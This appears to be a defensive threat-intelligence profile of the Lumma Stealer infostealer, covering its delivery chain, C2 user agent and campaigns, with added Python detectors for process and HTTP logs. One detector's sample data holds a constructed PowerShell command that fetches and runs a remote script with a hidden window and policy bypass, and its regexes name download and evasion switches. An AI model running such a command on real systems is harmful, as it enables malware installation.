Lumma Stealer | |
Type of Malware | Infostealer and Banking Trojan |
Country of Origin | Russia |
Date of initial activity | August 2022 |
Targeted Countries | Global |
Additional Names | LummaC2 Stealer |
Associated Groups | Plymouth, Shamel |
Variants | CrackedCantil |
Motivation | Financial gain |
Attack Vectors | Infected email attachments, malicious online ads, social engineering, software cracks, phishing emails, spam, fake updates, YouTube, Discord |
Targeted Systems | Windows |
Overview
Lumma Stealer, also known as LummaC2 Stealer, is an information-stealing malware first observed in August 2022. Developed by the threat actor known as “Shamel” or “Lumma,” it is sold under a Malware-as-a-Service (MaaS) model on Russian-speaking forums. Written in C, Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions. It exfiltrates stolen data to a command-and-control (C2) server via HTTP POST requests that carry the user agent “TeslaBrowser/5.5.”
The malware’s capabilities extend beyond simple data theft; it includes a non-resident loader that can deliver additional malicious payloads in the form of EXE, DLL, or PowerShell scripts. This makes Lumma Stealer a versatile tool in the arsenal of cybercriminals, combining targeted data extraction with the potential for further compromise through additional malware delivery.
Targets
Cryptocurrency wallets, 2FA browser extensions, sensitive information
How they operate
Lumma Stealer reaches victims through several delivery methods, usually disguised as legitimate software or embedded in malicious content. One documented chain uses compromised YouTube accounts whose video descriptions link to infected files: the victim is lured into downloading a ZIP archive, the archive contains an LNK (shortcut) file rather than the promised software, and opening the shortcut runs a PowerShell script that fetches the remaining components from a remote location such as GitHub.
Once running, Lumma Stealer deploys a non-resident loader that delivers additional payloads and establishes persistence on the victim’s machine. The loader performs environment checks, including anti-virtual-machine and anti-debugging checks, to evade detection and sandbox analysis before executing the main Lumma Stealer payload. The payload then harvests sensitive data, primarily from cryptocurrency wallets and 2FA extensions, but also other valuable information stored on the infected system.
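The delivery chain above (ZIP, then LNK, then PowerShell pulling a second stage from a remote host) leaves a characteristic footprint in process-creation telemetry. The following Python is an added example of how a defender can triage that telemetry; it is not code from this page or from Lumma’s operators. It assumes Sysmon Event ID 1-style fields (image, parent image, command line), treats PowerShell spawned by explorer.exe as the signature of a double-clicked shortcut, and uses constructed sample events whose GitHub URL is a placeholder, not a real indicator.

```python
"""Added example: triage process-creation telemetry for the ZIP -> LNK ->
PowerShell -> remote download chain described above.

Assumptions (not from the page): events carry Sysmon Event ID 1-style
fields; a double-clicked LNK shows up as PowerShell spawned by explorer.exe;
the sample events and the GitHub URL in them are constructed for this
example and are not real indicators of compromise.
"""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    image: str          # full path of the new process
    parent_image: str   # full path of the parent process
    command_line: str   # command line of the new process


# PowerShell primitives that fetch content from a remote host.
DOWNLOAD_PRIMITIVES = re.compile(
    r"(invoke-webrequest|\biwr\b|invoke-restmethod|\birm\b|downloadstring|"
    r"downloadfile|start-bitstransfer|net\.webclient|\bcurl\b|\bwget\b)",
    re.IGNORECASE,
)
# Switches used to hide the console, skip profiles, bypass policy or pass encoded commands.
EVASION_SWITCHES = re.compile(
    r"(-w(indowstyle)?\s+hidden|-nop\b|-noprofile\b|-ep\s+bypass|"
    r"-executionpolicy\s+bypass|-enc\b|-encodedcommand\b)",
    re.IGNORECASE,
)
URL = re.compile(r"https?://[^\s'\"]+", re.IGNORECASE)


def is_powershell(image: str) -> bool:
    name = image.replace("/", "\\").rsplit("\\", 1)[-1].lower()
    return name in {"powershell.exe", "pwsh.exe"}


def score_event(ev: ProcEvent):
    """Score one event; returns (score, reasons). Non-PowerShell events score 0."""
    if not is_powershell(ev.image):
        return 0, []
    score, reasons = 0, []
    if ev.parent_image.lower().endswith("\\explorer.exe"):
        score += 1
        reasons.append("PowerShell spawned by explorer.exe (consistent with a double-clicked LNK)")
    if DOWNLOAD_PRIMITIVES.search(ev.command_line):
        score += 2
        reasons.append("remote download primitive in command line")
    if EVASION_SWITCHES.search(ev.command_line):
        score += 1
        reasons.append("hidden window / policy bypass / encoded command")
    if any("github" in u.lower() for u in URL.findall(ev.command_line)):
        score += 1
        reasons.append("second stage fetched from GitHub")
    return score, reasons


def triage(events, threshold: int = 4):
    """Return [(event, score, reasons)] for events scoring at or above the threshold."""
    hits = []
    for ev in events:
        score, reasons = score_event(ev)
        if score >= threshold:
            hits.append((ev, score, reasons))
    return hits


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [  # constructed telemetry, not captured from a real infection
    ProcEvent(PS, r"C:\Windows\explorer.exe",
              'powershell.exe -w hidden -ep bypass -c "iwr '
              'https://github.com/example-org/example-repo/raw/main/stage2.ps1 '
              '-OutFile $env:TEMP\\s.ps1; & $env:TEMP\\s.ps1"'),
    ProcEvent(PS, r"C:\Windows\System32\cmd.exe",
              "powershell.exe Get-Process | Sort-Object CPU -Descending"),
    ProcEvent(PS, r"C:\Windows\System32\cmd.exe",
              'powershell.exe -NoProfile -Command "Invoke-WebRequest '
              'https://intranet.example.local/tools/agent.msi -OutFile C:\\Temp\\agent.msi"'),
    ProcEvent(r"C:\Windows\System32\notepad.exe", r"C:\Windows\explorer.exe",
              "notepad.exe readme.txt"),
]

if __name__ == "__main__":
    for ev, score, reasons in triage(SAMPLE_EVENTS):
        print(f"score={score} cmd={ev.command_line!r}")
        for reason in reasons:
            print("  -", reason)
```

The third sample event (an administrator fetching an installer from an intranet host) scores 3 and stays below the threshold: a download primitive alone is routine, and it is the combination with an explorer.exe parent, a hidden window and a public code-hosting URL that makes the first event stand out. Tune the threshold against your own baseline of PowerShell activity before alerting on it.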
Stolen data is exfiltrated to a Command and Control (C2) server in HTTP POST requests that carry the custom user agent string “TeslaBrowser/5.5.” Although intended to pass as ordinary browser traffic, this string is not sent by any legitimate browser, so it is also a reliable network indicator for defenders who log user agents at the proxy or egress point. The exfiltrated data includes credentials, financial information, and other sensitive data that can be exploited for further malicious purposes, and the C2 communication is designed to be covert, minimizing the risk of detection by traditional security measures.
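Because the C2 channel above is plain HTTP with a fixed user agent, the exfiltration can be hunted in existing web logs. The following Python is an added example (not code from this page or from the malware) that scans Zeek http.log-style records for the TeslaBrowser user agent and summarizes, per source host, which C2 addresses were contacted and how many requests were POSTs. It assumes a tab-separated log with the reduced field set shown; the records are constructed for this example and use documentation address ranges, not real C2 infrastructure.

```python
"""Added example: hunt Zeek http.log-style records for the Lumma Stealer
C2 pattern described above (HTTP POST with the user agent TeslaBrowser/5.5).

Assumptions (not from the page): the log is tab-separated with the reduced
field set below; the records are constructed for this example and the
addresses in them are documentation ranges, not real C2 infrastructure.
"""
import re
from collections import defaultdict

FIELDS = ["ts", "id.orig_h", "id.resp_h", "method", "host", "uri", "user_agent"]

# Match the whole TeslaBrowser/<version> family: the page documents 5.5, but a
# later build may bump the number. No mainstream browser sends this string.
LUMMA_UA = re.compile(r"^TeslaBrowser/\d+(\.\d+)*$", re.IGNORECASE)


def parse_http_log(text: str):
    """Parse tab-separated records; comment lines and malformed rows are skipped."""
    records = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        parts = line.split("\t")
        if len(parts) != len(FIELDS):
            continue  # truncated or foreign line, do not guess at its fields
        records.append(dict(zip(FIELDS, parts)))
    return records


def is_lumma_ua(record) -> bool:
    return LUMMA_UA.match(record["user_agent"].strip()) is not None


def find_beacons(records):
    """All requests carrying the Lumma user agent, regardless of HTTP method."""
    return [r for r in records if is_lumma_ua(r)]


def summarize(beacons):
    """Per source host: C2 addresses contacted and how many requests were POSTs."""
    summary = defaultdict(lambda: {"c2": set(), "posts": 0})
    for b in beacons:
        entry = summary[b["id.orig_h"]]
        entry["c2"].add(b["id.resp_h"])
        if b["method"].upper() == "POST":  # POSTs are the exfiltration channel
            entry["posts"] += 1
    return dict(summary)


def _row(*cols):
    return "\t".join(cols)


SAMPLE_HTTP_LOG = "\n".join([  # constructed records, not a real capture
    "#fields\t" + "\t".join(FIELDS),
    _row("1700000001.1", "10.0.0.5", "203.0.113.10", "POST", "203.0.113.10", "/", "TeslaBrowser/5.5"),
    _row("1700000002.2", "10.0.0.5", "198.51.100.7", "GET", "www.example.com", "/", "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"),
    _row("1700000003.3", "10.0.0.8", "203.0.113.10", "POST", "203.0.113.10", "/", "TeslaBrowser/5.5"),
    _row("1700000004.4", "10.0.0.9", "203.0.113.22", "GET", "203.0.113.22", "/", "TeslaBrowser/5.6"),
    _row("1700000005.5", "10.0.0.8", "198.51.100.7", "POST", "api.example.com", "/upload", "curl/8.4.0"),
    "truncated line with too few fields",
])

if __name__ == "__main__":
    for src, info in summarize(find_beacons(parse_http_log(SAMPLE_HTTP_LOG))).items():
        print(f"{src}: C2={sorted(info['c2'])} POSTs={info['posts']}")
```

A match on the user agent alone is worth an alert; the POST count tells the responder which hosts have already shipped data rather than merely checked in. The same rule translates directly into a proxy or NDR signature on the User-Agent header.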
MITRE Tactics and Techniques
Initial Access (TA0001)
Execution (TA0002)
Persistence (TA0003)
Privilege Escalation (TA0004)
Defense Evasion (TA0005)
Credential Access (TA0006)
Discovery (TA0007)
Exfiltration (TA0010)
Impact / Significant Attacks
YouTube Distribution Campaigns (January 2024)
Lumma Stealer was prominently distributed via compromised YouTube channels. Cybercriminals leveraged popular video platforms to disguise malicious links as legitimate software downloads, leading to widespread infections. The malware was embedded in ZIP files and distributed through YouTube video descriptions, taking advantage of the platform’s reach to spread the infection.
High-Profile Cryptocurrency Theft (August 2023)
Lumma Stealer played a key role in a large-scale cryptocurrency theft operation. The malware targeted users of popular cryptocurrency wallets and 2FA extensions, leading to the exfiltration of sensitive financial information. This attack resulted in significant losses for victims, underscoring the malware’s effectiveness in targeting digital assets.
Credential Harvesting Campaign (December 2023)
In late 2023, Lumma Stealer was involved in a campaign that focused on harvesting credentials from various online services. The malware collected data from email clients, social media accounts, and other online platforms, leading to widespread credential breaches and account takeovers.
Corporate Data Breach (November 2023)
Lumma Stealer was used in a targeted attack against a corporate network. The malware was delivered through phishing emails, and once inside the network, it exfiltrated sensitive corporate data, including financial records and proprietary information. This breach highlighted the malware’s capability to penetrate and operate within corporate environments.
Ransomware Deployment Support (October 2023)
In some cases, Lumma Stealer was employed as a precursor to ransomware attacks. The stolen data, including sensitive business information and personal details, was used to coerce victims into paying ransoms. This tactic demonstrated the malware’s role in facilitating more severe forms of cyber extortion.